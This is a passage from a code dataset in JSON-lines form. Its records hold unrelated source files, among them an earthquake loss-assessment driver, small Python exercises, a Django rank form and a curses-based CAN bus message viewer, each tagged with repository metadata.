%s. The indicated \"\n \"directory may have already been used by a previous run. The program will stop.\"\n % (os.path.join(config.main_path, \"current\"))\n )\n logger.critical(error_message)\n raise OSError(error_message)\n\n # Create sub-directory to store files associated with number of occupants in time\n path_to_occupants = os.path.join(config.main_path, \"current\", \"occupants\")\n if not os.path.exists(path_to_occupants):\n os.mkdir(path_to_occupants)\n else:\n error_message = (\n \"The directory 'occupants' already exists under %s/current and may contain \"\n \"results from a previous run. The program will stop.\"\n % (config.main_path)\n )\n logger.critical(error_message)\n raise OSError(error_message)\n\n # Read input to simulate triggering (calculations after an earthquake of interest and/or\n # at specific points in time, e.g. mid-night)\n triggers = Loader.load_triggers(\n os.path.join(config.main_path, \"triggering.csv\"),\n os.path.join(config.main_path, \"catalogues\")\n )\n log_summary.append(\n \"First filename in triggering.csv is '%s'\" % (triggers.loc[0, \"catalogue_filename\"])\n )\n\n # Load data needed for RLA\n if \"RLA\" in triggers[\"type_analysis\"].to_numpy():\n # Verify/build rupture XML files for RLA\n rla_ruptures = RLA_Ruptures(triggers, config.main_path)\n\n # Damage results from SHM\n damage_results_SHM = pd.read_csv(\n os.path.join(config.main_path, \"shm\", \"damage_results_shm.csv\")\n )\n new_index = pd.MultiIndex.from_arrays(\n [damage_results_SHM[\"building_id\"], damage_results_SHM[\"dmg_state\"]]\n )\n damage_results_SHM.index = new_index\n damage_results_SHM = damage_results_SHM.drop(columns=[\"dmg_state\"])\n\n # Load the consequence models\n consequence_economic = pd.read_csv(\n os.path.join(config.main_path, \"static\", \"consequences_economic.csv\")\n )\n consequence_economic.set_index(\n consequence_economic[\"Taxonomy\"], drop=True, inplace=True\n )\n consequence_economic = consequence_economic.drop(columns=[\"Taxonomy\"])\n\n consequence_injuries = {}\n for severity in config.injuries_scale:\n consequence_injuries[severity] = pd.read_csv(\n os.path.join(\n config.main_path, \"static\", \"consequences_injuries_severity_%s.csv\" % (severity)\n )\n )\n consequence_injuries[severity].set_index(\n consequence_injuries[severity][\"Taxonomy\"], drop=True, inplace=True\n )\n consequence_injuries[severity] = consequence_injuries[severity].drop(\n columns=[\"Taxonomy\"]\n )\n\n # Load the recovery times (used for updating occupants)\n recovery_damage = pd.read_csv(\n os.path.join(config.main_path, \"static\", \"recovery_damage.csv\"),\n dtype={\"dmg_state\": str, \"N_inspection\": int, \"N_repair\":int},\n )\n recovery_damage.set_index(recovery_damage[\"dmg_state\"], drop=True, inplace=True)\n recovery_damage = recovery_damage.drop(columns=[\"dmg_state\"])\n recovery_damage[\"N_damage\"] = recovery_damage[\"N_inspection\"] + recovery_damage[\"N_repair\"]\n\n sum_days = recovery_damage[\"N_damage\"].sum()\n if sum_days < 0.1:\n log_summary.append(\"No update of occupants in 'recovery_damage'\")\n else:\n log_summary.append(\"With update of occupants in 'recovery_damage'\")\n\n # Smallest number of days to allow people back into buildings\n shortest_recovery_span = recovery_damage[\"N_damage\"].min() # days\n\n recovery_injuries = pd.read_csv(\n os.path.join(config.main_path, \"static\", \"recovery_injuries.csv\"),\n dtype={\"injuries_scale\": str, \"N_discharged\": int},\n )\n recovery_injuries.set_index(recovery_injuries[\"injuries_scale\"], drop=True, inplace=True)\n recovery_injuries = recovery_injuries.drop(columns=[\"injuries_scale\"])\n\n sum_days = recovery_injuries[\"N_discharged\"].sum()\n if sum_days < 0.1:\n log_summary.append(\"No update of occupants in 'recovery_injuries'\")\n else:\n log_summary.append(\"With update of occupants in 'recovery_injuries'\")\n\n # Load the \"initial\" exposure model\n exposure_model_undamaged = pd.read_csv(\n os.path.join(config.main_path, \"exposure_models\", \"exposure_model_undamaged.csv\")\n )\n exposure_model_undamaged.index = exposure_model_undamaged[\"id\"]\n exposure_model_undamaged.index = exposure_model_undamaged.index.rename(\"asset_id\")\n exposure_model_undamaged = exposure_model_undamaged.drop(columns=[\"id\"])\n\n # Check that consequence models cover all the building classes in 'exposure_model_undamaged'\n classes_are_missing, missing_building_classes = Losses.check_consequence_models(\n {\n \"economic\": consequence_economic,\n \"injuries\": consequence_injuries,\n },\n exposure_model_undamaged\n )\n\n if classes_are_missing:\n error_message = (\n \"The following building classes are missing from the consequence models: %s\"\n % (missing_building_classes)\n )\n logger.critical(error_message)\n raise OSError(error_message)\n\n # Copy the \"initial\" exposure model to the 'current' sub-directory to initialise the process\n in_filename = os.path.join(\n config.main_path, \"exposure_models\", \"exposure_model_undamaged.csv\"\n ) # origin\n out_filename = os.path.join(config.main_path, \"current\", \"exposure_model_current.csv\")\n _ = shutil.copyfile(in_filename, out_filename)\n\n processed_rla = []\n processed_oelf = []\n\n date_latest_rla = None\n\n for i, cat_filename_i in enumerate(triggers[\"catalogue_filename\"].to_numpy()):\n type_analysis_i = triggers[\"type_analysis\"].to_numpy()[i]\n\n logger.info(\n \"%s Running trigger %s of %s: %s with %s\"\n % (np.datetime64('now'), i+1, triggers.shape[0], type_analysis_i, cat_filename_i)\n )\n\n if type_analysis_i == \"RLA\":\n cat_name = cat_filename_i.split(\".\")[0] # Get rid of \".csv\"\n processed_rla.append(cat_name)\n\n # Read earthquake parameters\n earthquake_df = pd.read_csv(\n os.path.join(config.main_path, \"catalogues\", cat_filename_i)\n )\n earthquake_df[\"datetime\"] = pd.to_datetime(earthquake_df[\"datetime\"])\n earthquake_params = earthquake_df.loc[0, :].to_dict()\n\n results = RapidLossAssessment.run_rla(\n earthquake_params,\n config.description_general,\n config.main_path,\n rla_ruptures.mapping[cat_filename_i],\n config.state_dependent_fragilities,\n consequence_economic,\n consequence_injuries,\n recovery_damage,\n recovery_injuries,\n config.injuries_longest_time,\n config.time_of_day_occupancy,\n config.timezone,\n exposure_model_undamaged,\n config.mapping_damage_states,\n damage_results_SHM.loc[:, earthquake_params[\"event_id\"]],\n config.store_intermediate,\n config.store_openquake,\n )\n (\n exposure_updated,\n damage_states,\n losses_economic,\n losses_human,\n injured_still_away,\n occupancy_factors,\n ) = results\n\n # Update 'exposure_model_current.csv'\n exposure_updated.to_csv(\n os.path.join(config.main_path, \"current\", \"exposure_model_current.csv\"),\n index=False,\n )\n\n # Store number of injured people away from the building in time, per asset ID\n injured_still_away.to_csv(\n os.path.join(\n config.main_path,\n \"current\",\n \"occupants\",\n \"injured_still_away_after_RLA_%s.csv\" % (cat_name)\n ),\n index=True,\n )\n\n # Store occupancy factors (0: people not allowed in, 1: people allowed in) as a\n # function of time and damage state\n occupancy_factors.to_csv(\n os.path.join(\n config.main_path,\n \"current\",\n \"occupants\",\n \"occupancy_factors_after_RLA_%s.csv\" % (cat_name)\n ),\n index=True,\n )\n\n # Store damage states per building ID\n damage_states.to_csv(\n os.path.join(\n config.main_path,\n \"output\",\n \"damage_states_after_RLA_%s.csv\" % (cat_name)\n ),\n index=True,\n )\n\n # Store economic losses per building ID\n losses_economic.to_csv(\n os.path.join(\n config.main_path,\n \"output\",\n \"losses_economic_after_RLA_%s.csv\" % (cat_name)\n ),\n index=True,\n )\n\n # Store human losses per building ID\n losses_human.to_csv(\n os.path.join(\n config.main_path,\n \"output\",\n \"losses_human_after_RLA_%s.csv\" % (cat_name)\n ),\n index=True,\n )\n\n # Update 'date_latest_rla'\n date_latest_rla = (earthquake_params[\"datetime\"]).to_pydatetime()\n\n elif type_analysis_i == \"OELF\":\n # Read forecast earthquake catalogue\n forecast_cat = pd.read_csv(\n os.path.join(config.main_path, \"catalogues\", cat_filename_i)\n )\n forecast_cat = OperationalEarthquakeLossForecasting.format_seismicity_forecast(\n forecast_cat, add_event_id=True, add_depth=False\n ) # The index of 'forecast_cat' is the unique ID \"[ses_id]-[event_id]\"\n\n # Filter catalogue as per minimum magnitude and maximum distance (so as to not build\n # ruptures for earthquakes that will not be used to calculate damage)\n exposure_lons, exposure_lats = ExposureUpdater.get_unique_exposure_locations(\n exposure_model_undamaged\n )\n forecast_cat_filtered, earthquakes_to_run = (\n OperationalEarthquakeLossForecasting.filter_forecast(\n forecast_cat,\n exposure_lons,\n exposure_lats,\n config.oelf[\"min_magnitude\"],\n config.oelf[\"max_distance\"],\n )\n )\n forecast_cat[\"to_run\"] = earthquakes_to_run\n logger.info(\n \"%s out of %s earthquakes will be run, all other earthquakes \"\n \"will be assumed to cause no damage.\"\n % (earthquakes_to_run.sum(), forecast_cat.shape[0])\n )\n\n # Get rid of \".txt\", replace \".\", \"-\" and \":\" with \"_\"\n forecast_name = (\n \"_\".join(cat_filename_i.split(\".\")[:-1]).replace(\"-\", \"_\").replace(\":\", \"_\")\n )\n processed_oelf.append(forecast_name)\n\n # Create sub-directory to store stochastically-generated rupture XML files\n path_to_ruptures = os.path.join(config.main_path, \"ruptures\", \"oelf\", forecast_name)\n if not os.path.exists(path_to_ruptures):\n os.mkdir(path_to_ruptures)\n else:\n error_message = (\n \"The directory %s already exists under %s/ruptures/oelf and may contain \"\n \"results from a previous run. The program will stop.\"\n % (forecast_name, config.main_path)\n )\n logger.critical(error_message)\n raise OSError(error_message)\n\n # Instantiate the rupture set generator from xml\n stoch_rup = StochasticRuptureSet.from_xml(\n os.path.join(config.main_path, \"ruptures\", config.oelf_source_model_filename),\n mmin=4.5, # Minimum magnitude - for calculating total rates\n region_properties=config.oelf[\"rupture_region_properties\"],\n rupture_generator_seed=config.oelf[\"rupture_generator_seed\"]\n )\n\n # Generate the ruptures for all earthquakes in 'forecast'\n ruptures = stoch_rup.generate_ruptures(\n forecast_cat_filtered,\n path_to_ruptures, # Ruptures will be exported to this path\n export_type='xml', # Type of file for export\n )\n\n # Determine if occupants need to be updated (or considered zero), based on the time\n # ellapsed since the last real (RLA) earthquake and the shortest recovery span\n # specified by the user (shortest time to allow occupants back in)\n there_can_be_occupants = (\n OperationalEarthquakeLossForecasting.can_there_be_occupants(\n forecast_cat, date_latest_rla, shortest_recovery_span, (59./(3600.*24.))\n )\n )\n if there_can_be_occupants:\n logger.info(\"There might be occupants in buildings during OELF calculation.\")\n else:\n logger.info(\n \"Occupants are all zero during OELF calculation \"\n \"(too short time since last real earthquake)\"\n )\n\n damage_states, losses_economic, losses_human = (\n OperationalEarthquakeLossForecasting.run_oelf(\n forecast_cat,\n forecast_name,\n there_can_be_occupants,\n config.oelf[\"continuous_ses_numbering\"],\n config.oelf[\"ses_range\"],\n config.state_dependent_fragilities,\n config.description_general,\n config.main_path,\n exposure_model_undamaged,\n consequence_economic,\n consequence_injuries,\n recovery_damage,\n recovery_injuries,\n config.injuries_longest_time,\n config.time_of_day_occupancy,\n config.timezone,\n config.mapping_damage_states,\n config.store_intermediate,\n config.store_openquake,\n )\n )\n\n # Store damage states per building ID\n damage_states.to_csv(\n os.path.join(\n config.main_path,\n \"output\",\n \"damage_states_after_OELF_%s.csv\" % (forecast_name)\n ),\n index=True,\n )\n\n # Store economic losses per building ID\n losses_economic.to_csv(\n os.path.join(\n config.main_path,\n \"output\",\n \"losses_economic_after_OELF_%s.csv\" % (forecast_name)\n ),\n index=True,\n )\n\n # Store human losses per building ID\n losses_human.to_csv(\n os.path.join(\n config.main_path,\n \"output\",\n \"losses_human_after_OELF_%s.csv\" % (forecast_name)\n ),\n index=True,\n )\n\n # Post-process individual outputs\n if config.post_process[\"collect_csv\"]:\n exposure_expected_costs_occupants = Losses.get_expected_costs_occupants(\n exposure_model_undamaged\n )\n PostProcessor.export_collected_output_damage(\n config.main_path, processed_rla, processed_oelf\n )\n\n PostProcessor.export_collected_output_losses_economic(\n config.main_path, processed_rla, processed_oelf, exposure_expected_costs_occupants\n )\n\n PostProcessor.export_collected_output_losses_human(\n config.main_path,\n config.injuries_scale,\n processed_rla,\n processed_oelf,\n exposure_expected_costs_occupants,\n )\n\n # Save 'log_summary' (to create log file that allows for a quick check of correct input)\n log_summary.append(\"Real-Time Loss Tools has finished\")\n Writer.write_txt_from_list(\n log_summary, os.path.join(config.main_path, \"quick_input_check.txt\")\n )\n\n # Leave the program\n logger.info(\"Real-Time Loss Tools has finished\")\n sys.exit()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"CINievas/real-time-loss-tools","sub_path":"realtimelosstools/realtimelosstools.py","file_name":"realtimelosstools.py","file_ext":"py","file_size_in_byte":19049,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"74766605600","text":"# 빨강(red), 초록(green), 파랑(blue) 빛을 섞어 여러 가지 다른 색 빛을 만들어 내려고 한다.\n\n# 빨강(r), 초록(g), 파랑(b) 각 빛의 가짓수가 주어질 때,\n# 주어진 rgb 빛들을 섞어 만들 수 있는 모든 경우의 조합(r g b)과 만들 수 있는 색의 가짓 수를 계산해보자. \n\nr, g, b = map(int, input().split())\n\ncnt = 0\n\nfor i in range(r):\n for j in range(g):\n for k in range(b):\n print('%d %d %d' %(i, j, k))\n\n cnt += 1\n\nprint(cnt)\n","repo_name":"ererink/TIL","sub_path":"Algorithm/codeup/6083.py","file_name":"6083.py","file_ext":"py","file_size_in_byte":525,"program_lang":"python","lang":"ko","doc_type":"code","stars":6,"dataset":"github-code","pt":"54"} +{"seq_id":"73680265761","text":"import numpy as np\nimport scipy.io\nfrom datasets.read_libsvm import *\nimport logging\nimport logging.config\nimport os\n\ndef libsvm2mat(fname, ndata, nfeatures, binary=True):\n\n FORMAT = '%(asctime)-15s %(message)s'\n logging.basicConfig(format=FORMAT, level=logging.DEBUG)\n logger = logging.getLogger(\"opt\")\n\n logger.info(\"Starting data read\")\n\n (X, d) = readLibSVM(fname=fname, ndata=ndata, nfeatures=nfeatures, binary=binary)\n\n # Permute rows\n #logger.info(\"Permuting rows\")\n #np.random.seed(42)\n #perm = np.random.permutation(ndata)\n #X = X[perm, :]\n #d = d[perm]\n\n logger.info(\"Convert dataset to CSC, in transposed form\")\n X = X.tocsr().transpose()\n\n logger.info(\"Saving full dataset ...\")\n\n # Save in matlab format\n scipy.io.savemat(\n file_name=\"%s.mat\" % fname,\n mdict={'X': X, 'd': d},\n do_compression=True,\n format='5',\n oned_as='row')\n \n logger.info(\"Done!!!\")\n","repo_name":"adefazio/point-saga","sub_path":"datasets/libsvm2mat.py","file_name":"libsvm2mat.py","file_ext":"py","file_size_in_byte":956,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"54"} +{"seq_id":"29646631210","text":"#!/usr/bin/env python\nimport sys\nimport json\nimport codecs\nimport collections\n\n\ndef main(args):\n\tfield = args[0]\n\tarray = json.load(sys.stdin)\n\ts = [unicode(e[field]) for e in array]\n\ts = [(item, count) for item, count in collections.Counter(s).items() if count > 1]\n\tw = codecs.getwriter('utf-8')(sys.stdout)\n\tfor item, count in sorted(s):\n\t\tw.write(u\"%d - %s\\n\" % (count, item))\n\tw.flush()\n\n\nif __name__ == '__main__':\n\tmain(sys.argv[1:])\n","repo_name":"apecpt/apec-importers","sub_path":"tools/dups.py","file_name":"dups.py","file_ext":"py","file_size_in_byte":441,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"4539494818","text":"import re\nclass Solution(object):\n def simplifyPath(self, path):\n paths = re.split('/+', path)\n stack = []\n for ch in paths:\n if ch == '' or ch == '.':\n continue\n elif ch == '..':\n if len(stack) > 0:\n stack.pop()\n else:\n stack.append(ch)\n if len(stack) == 0:\n return '/'\n res = ''\n for folder in stack:\n res = res + '/' + folder\n return res","repo_name":"robbyvan/looseCannon","sub_path":"String/71_simplifyPath.py","file_name":"71_simplifyPath.py","file_ext":"py","file_size_in_byte":417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"36455287650","text":"'''\nMin Absolute Diff\nGiven a list find the minimum absolute difference between any to elements.\n\nInput\nFirst line is N Then follows a line consisting of N numbers. (N >= 2)\n\nOutput\nPrint a single number the min difference.\n\nExample\nInput:\n\n4\n\n5 2 1 3\n\nOutput: 1\n'''\n'''\n\nn=int(input())\nb=list(map(int,input().split()))\nmi=abs(b[0]-b[1])\nfor i in range(n):\n for j in range(n):\n if i!=j:\n su=abs(b[i]-b[j])\n if mi>su:\n mi=su\nprint(mi)\nproblem- more time complexity\n'''\n'''\nn=int(input())\nb=list(map(int,input().split()))\nb=sorted(b)\nmi=abs(b[0]-b[1])\nfor i in range(1,n):\n temp=b[i-1]\n j=i\n while (temp<=(b[j]+mi)) and j<(n-1):\n su=abs(temp-b[i])\n if mi>su:\n mi=su\n j=j+1\nprint(mi)\nproblem- more time complexity\n'''\nn=int(input())\nb=list(map(int,input().split()))\nb=sorted(b)\nmi=abs(b[0]-b[1])\nfor i in range(1,n):\n sub=abs(b[i]-b[i-1])\n if mi>sub:\n mi=sub\nprint(mi)\n","repo_name":"iamnishantchandra/DSA-QA-Using-Python","sub_path":"10X/Python/Array/MinAbsoluteDiff.py","file_name":"MinAbsoluteDiff.py","file_ext":"py","file_size_in_byte":967,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"5677577203","text":"from django.core.validators import RegexValidator\nfrom django.utils.translation import ugettext_lazy as _\nimport floppyforms as forms\nfrom misago.forms import Form, YesNoSwitch\nfrom misago.models import Role\nfrom misago.validators import validate_sluggable\n\nclass RankForm(Form):\n name = forms.CharField(label=_(\"Rank Name\"),\n \t\t\t\t\t help_text=_(\"Rank Name is used to identify rank in Admin Control Panel and is used as page and tab title if you decide to make this rank act as tab on users list.\"),\n \t\t\t\t\t max_length=255, validators=[validate_sluggable(\n _(\"Rank name must contain alphanumeric characters.\"),\n _(\"Rank name is too long.\")\n )])\n description = forms.CharField(label=_(\"Rank Description\"),\n \t\t\t\t\t\t\t help_text=_(\"If this rank acts as tab on users list, here you can enter optional description that will be displayed above list of users with this rank.\"),\n \t\t\t\t\t\t\t widget=forms.Textarea, required=False)\n title = forms.CharField(label=_(\"Rank Title\"),\n \t\t\t\t\t\thelp_text=_(\"Short description of rank's bearer role in your community.\"),\n \t\t\t\t\t\tmax_length=255, required=False)\n style = forms.CharField(label=_(\"Rank CSS Class\"),\n \t\t\t\t\t\thelp_text=_(\"Optional CSS class that will be added to different elements displaying rank's owner or his content, allowing you to make them stand out from other members.\"),\n \t\t\t\t\t\tmax_length=255, required=False)\n special = forms.BooleanField(label=_(\"Special Rank\"),\n \t\t\t\t\t\t\t help_text=_(\"Special ranks are ignored during updates of user ranking, making them unattainable without admin ingerention.\"),\n \t\t\t\t\t\t\t widget=YesNoSwitch, required=False)\n as_tab = forms.BooleanField(label=_(\"As Tab on Users List\"),\n \t\t\t\t\t\t\thelp_text=_(\"Should this rank have its own page on users list, containing rank's description and list of users that have it? This is good option for rank used by forum team members or members that should be visible and easily reachable.\"),\n \t\t\t\t\t\t\twidget=YesNoSwitch, required=False)\n on_index = forms.BooleanField(label=_(\"Display members online\"),\n \t\t\t\t\t\t\t help_text=_(\"Should users online with this rank be displayed on board index?\"),\n \t\t\t\t\t\t\t widget=YesNoSwitch, required=False)\n criteria = forms.CharField(label=_(\"Rank Criteria\"),\n \t\t\t\t\t\t help_text=_(\"This setting allows you to limit number of users that can attain this rank. Enter 0 to assign this rank to all members (good for default rank). To give this rank to 10% of most active members, enter \\\"10%\\\". To give this rank to 10 most active members, enter \\\"10\\\". This setting is ignored for special ranks as they don't participate in user's ranking updates.\"),\n \t\t\t\t\t\t max_length=255, initial='0', validators=[RegexValidator(regex='^(\\d+)(%?)$', message=_('This is incorrect rank match rule.'))], required=False)\n roles = False\n\n def finalize_form(self):\n if self.request.user.is_god():\n self.add_field('roles', forms.ModelMultipleChoiceField(label=_(\"Rank Roles\"),\n \t\t\t\t\t\t\t\t\t\t\t\t\t help_text=_(\"You can grant users with this rank extra roles to serve either as rewards or signs of trust to active members.\"),\n \t\t\t \t\t\t\t\t\t\t\t\t\t widget=forms.CheckboxSelectMultiple, queryset=Role.objects.order_by('name').all(), required=False))\n else:\n self.add_field('roles', forms.ModelMultipleChoiceField(label=_(\"Rank Roles\"),\n \t\t\t\t\t\t\t\t\t\t\t\t\t help_text=_(\"You can grant users with this rank extra roles to serve either as rewards or signs of trust to active members.\"),\n \t\t\t \t\t\t\t\t\t\t\t\t\t widget=forms.CheckboxSelectMultiple, queryset=Role.objects.filter(protected__exact=False).order_by('name').all(), required=False))\n","repo_name":"Maronato/aosalunos","sub_path":"misago/apps/admin/ranks/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":3922,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"31033942348","text":"#!/usr/bin/env python\nimport curses\nimport can\nimport sys\nimport threading\nimport time\n\n\nbustype = 'socketcan'\nrun = True\n\nclass BottomMenu():\n def __init__(self, assigned_window, tui):\n self.window = assigned_window\n self.tui = tui\n self.tui.lock.acquire()\n self.window.addstr(\"F5\", curses.color_pair(TUI.COLOR_MENU_SHORTCUT))\n self.window.addstr(\"Redraw\", curses.color_pair(TUI.COLOR_MENU_DESC))\n self.window.addstr(\"F6\", curses.color_pair(TUI.COLOR_MENU_SHORTCUT))\n self.window.addstr(\"SortBy\", curses.color_pair(TUI.COLOR_MENU_DESC))\n self.window.addstr(\"F8\", curses.color_pair(TUI.COLOR_MENU_SHORTCUT))\n self.window.addstr(\"Clear\", curses.color_pair(TUI.COLOR_MENU_DESC))\n self.window.addstr(\"F10\", curses.color_pair(TUI.COLOR_MENU_SHORTCUT))\n self.window.addstr(\"Quit\", curses.color_pair(TUI.COLOR_MENU_DESC))\n self.drawn = False\n self.tui.lock.release()\n\n def redraw(self):\n if not self.drawn:\n self.tui.lock.acquire()\n self.window.refresh()\n self.drawn = True\n self.tui.lock.release()\n\nclass MessagesHeader():\n def __init__(self, assigned_window, tui):\n self.window = assigned_window\n self.drawn = False\n self.tui = tui\n self.sort = None\n self.sortAscending = False\n\n def redraw(self):\n if not self.drawn:\n self.tui.lock.acquire()\n self.window.bkgd(' ', curses.color_pair(TUI.COLOR_HEADER))\n for col in self.tui.visibleColumns:\n text = self.tui.getColumnDescription(col)\n if self.sort == col:\n if self.sortAscending:\n text = \"^\" + text\n else:\n text = \"v\" + text\n else:\n text = \" \" + text\n offset = self.tui.getColumnOffset(col)\n if (offset > 0):\n offset -= 1\n self.window.addstr(0, offset, text, curses.color_pair(TUI.COLOR_HEADER))\n\n self.window.refresh()\n self.drawn = True\n self.tui.lock.release()\n\n def setSort(self, column, ascending):\n self.drawn = False\n self.sort = column\n self.sortAscending = ascending\n self.redraw()\n\nclass MessagesPad():\n def __init__(self, assigned_window, x, y, maxX, maxY, tui):\n self.window = assigned_window\n self.x = x\n self.y = y\n self.maxX = maxX\n self.maxY = maxY\n self.yOffset = 0\n self.tui = tui\n self.messages = [ ]\n self.counts = { }\n self.changes = { }\n self.hilights = { }\n self.sort = None\n self.sortAscending = False\n self.lastMessage = None\n\n def redraw(self):\n i = 0\n for msg in self.messages:\n for col in self.tui.visibleColumns:\n if msg.arbitration_id == self.lastMessage.arbitration_id and col in self.hilights[self.lastMessage.arbitration_id]:\n self.window.addstr(i, self.tui.getColumnOffset(col), str(self.getColumnForMessage(msg, col)), curses.color_pair(TUI.COLOR_MSG_HILIGHT))\n elif col in self.hilights[msg.arbitration_id]:\n self.window.addstr(i, self.tui.getColumnOffset(col), str(self.getColumnForMessage(msg, col)), curses.color_pair(TUI.COLOR_MSG_HILIGHT_OLD))\n else:\n self.window.addstr(i, self.tui.getColumnOffset(col), str(self.getColumnForMessage(msg, col)), curses.color_pair(TUI.COLOR_MSG))\n i += 1\n\n self.window.refresh(self.yOffset, 0, self.x,self.y, self.maxX, self.maxY)\n\n\n def getColumnForMessage(self, message, column):\n if column is TUI.COLUMN_TIMESTAMP:\n return message.timestamp\n elif column is TUI.COLUMN_MSGID:\n return f'{message.arbitration_id:03x}'\n elif column is TUI.COLUMN_BODY_BYTE_0:\n return f'{message.data[0]:02x}'\n elif column is TUI.COLUMN_BODY_BYTE_1:\n return f'{message.data[1]:02x}'\n elif column is TUI.COLUMN_BODY_BYTE_2:\n return f'{message.data[2]:02x}'\n elif column is TUI.COLUMN_BODY_BYTE_3:\n return f'{message.data[3]:02x}'\n elif column is TUI.COLUMN_BODY_BYTE_4:\n return f'{message.data[4]:02x}'\n elif column is TUI.COLUMN_BODY_BYTE_5:\n return f'{message.data[5]:02x}'\n elif column is TUI.COLUMN_BODY_BYTE_6:\n return f'{message.data[6]:02x}'\n elif column is TUI.COLUMN_BODY_BYTE_7:\n return f'{message.data[7]:02x}'\n elif column is TUI.COLUMN_COUNT:\n return str(self.counts[message.arbitration_id])\n elif column is TUI.COLUMN_CHANGES:\n return str(self.changes[message.arbitration_id])\n \n def getColumnIntForMessage(self, message, column):\n if column is TUI.COLUMN_TIMESTAMP:\n return message.timestamp\n elif column is TUI.COLUMN_MSGID:\n return message.arbitration_id\n elif column is TUI.COLUMN_BODY_BYTE_0:\n return message.data[0]\n elif column is TUI.COLUMN_BODY_BYTE_1:\n return message.data[1]\n elif column is TUI.COLUMN_BODY_BYTE_2:\n return message.data[2]\n elif column is TUI.COLUMN_BODY_BYTE_3:\n return message.data[3]\n elif column is TUI.COLUMN_BODY_BYTE_4:\n return message.data[4]\n elif column is TUI.COLUMN_BODY_BYTE_5:\n return message.data[5]\n elif column is TUI.COLUMN_BODY_BYTE_6:\n return message.data[6]\n elif column is TUI.COLUMN_BODY_BYTE_7:\n return message.data[7]\n elif column is TUI.COLUMN_COUNT:\n return self.counts[message.arbitration_id]\n elif column is TUI.COLUMN_CHANGES:\n return self.changes[message.arbitration_id]\n\n def addMessage(self, message):\n self.tui.lock.acquire()\n found = False\n i = 0\n for presentMsg in self.messages:\n if presentMsg.arbitration_id == message.arbitration_id:\n # compare messages and check if something has changed\n found = True\n changed = False\n self.hilights[presentMsg.arbitration_id].clear()\n for i in range(0, min(len(presentMsg.data), len(message.data))):\n if str(presentMsg.data[i]) != str(message.data[i]):\n self.hilights[presentMsg.arbitration_id].append(self.tui.COLUMN_BODY_BYTE_0 + i)\n presentMsg.data[i] = message.data[i]\n changed = True\n if changed:\n self.changes[presentMsg.arbitration_id] += 1\n break\n\n if not found:\n self.messages.append(message)\n self.counts[message.arbitration_id] = 0\n self.changes[message.arbitration_id] = 1\n\n if self.sort is not None:\n self.messages.sort(key = lambda x: self.getColumnIntForMessage(x, self.sort), reverse=self.sortAscending)\n\n self.hilights[message.arbitration_id] = [self.tui.COLUMN_TIMESTAMP, self.tui.COLUMN_MSGID, self.tui.COLUMN_COUNT, self.tui.COLUMN_BODY_BYTE_0, self.tui.COLUMN_BODY_BYTE_1, self.tui.COLUMN_BODY_BYTE_2, self.tui.COLUMN_BODY_BYTE_3, self.tui.COLUMN_BODY_BYTE_4, self.tui.COLUMN_BODY_BYTE_5, self.tui.COLUMN_BODY_BYTE_6, self.tui.COLUMN_BODY_BYTE_7]\n\n self.counts[message.arbitration_id] += 1\n self.lastMessage = message\n self.redraw()\n self.tui.lock.release()\n\n def clear(self):\n self.tui.lock.acquire()\n self.messages = [ ]\n self.counts = { }\n self.changes = { }\n self.hilights = { }\n self.window.clear()\n self.redraw()\n self.tui.lock.release()\n\n def setSort(self, column, ascending):\n self.tui.lock.acquire()\n self.sort = column\n self.sortAscending = ascending\n self.messages.sort(key = lambda x: self.getColumnIntForMessage(x, self.sort), reverse=self.sortAscending)\n self.window.clear()\n self.redraw()\n self.tui.lock.release()\n\n\n\nclass TUI():\n COLOR_MENU_SHORTCUT = 1\n COLOR_MENU_DESC = 2\n COLOR_HEADER = 3\n COLOR_MSG = 4\n COLOR_MSG_HILIGHT = 5\n COLOR_MSG_HILIGHT_OLD = 6\n\n COLUMN_TIMESTAMP = 1\n COLUMN_MSGID = 2\n COLUMN_COUNT = 3\n COLUMN_BODY_BYTE_0 = 4\n COLUMN_BODY_BYTE_1 = 5\n COLUMN_BODY_BYTE_2 = 6\n COLUMN_BODY_BYTE_3 = 7 \n COLUMN_BODY_BYTE_4 = 8\n COLUMN_BODY_BYTE_5 = 9\n COLUMN_BODY_BYTE_6 = 10\n COLUMN_BODY_BYTE_7 = 11\n COLUMN_CHANGES = 12\n\n visibleColumns = [COLUMN_MSGID, COLUMN_BODY_BYTE_0, COLUMN_BODY_BYTE_1, COLUMN_BODY_BYTE_2, COLUMN_BODY_BYTE_3, COLUMN_BODY_BYTE_4, COLUMN_BODY_BYTE_5, COLUMN_BODY_BYTE_6, COLUMN_BODY_BYTE_7, COLUMN_COUNT, COLUMN_CHANGES]\n\n def getColumnWidth(self, column):\n if column is TUI.COLUMN_TIMESTAMP:\n return 6\n elif column is TUI.COLUMN_MSGID:\n return 3\n elif column >= TUI.COLUMN_BODY_BYTE_0 and column <= TUI.COLUMN_BODY_BYTE_7:\n return 2\n elif column is TUI.COLUMN_COUNT:\n return 6\n\n def getColumnOffset(self, column):\n totalOffset = 0\n for col in self.visibleColumns:\n if col is column:\n return totalOffset\n totalOffset += self.getColumnWidth(col) + 3\n return -1\n\n def getColumnDescription(self, column):\n if column is TUI.COLUMN_TIMESTAMP:\n return \"Stamp\"\n elif column is TUI.COLUMN_MSGID:\n return \"ID\"\n elif column is TUI.COLUMN_COUNT:\n return \"COUNT\"\n elif column is TUI.COLUMN_BODY_BYTE_0:\n return \"B0\"\n elif column is TUI.COLUMN_BODY_BYTE_1:\n return \"B1\"\n elif column is TUI.COLUMN_BODY_BYTE_2:\n return \"B2\"\n elif column is TUI.COLUMN_BODY_BYTE_3:\n return \"B3\"\n elif column is TUI.COLUMN_BODY_BYTE_4:\n return \"B4\"\n elif column is TUI.COLUMN_BODY_BYTE_5:\n return \"B5\"\n elif column is TUI.COLUMN_BODY_BYTE_6:\n return \"B6\"\n elif column is TUI.COLUMN_BODY_BYTE_7:\n return \"B7\"\n elif column is TUI.COLUMN_CHANGES:\n return \"CHANGES\"\n\n\n def __init__(self):\n 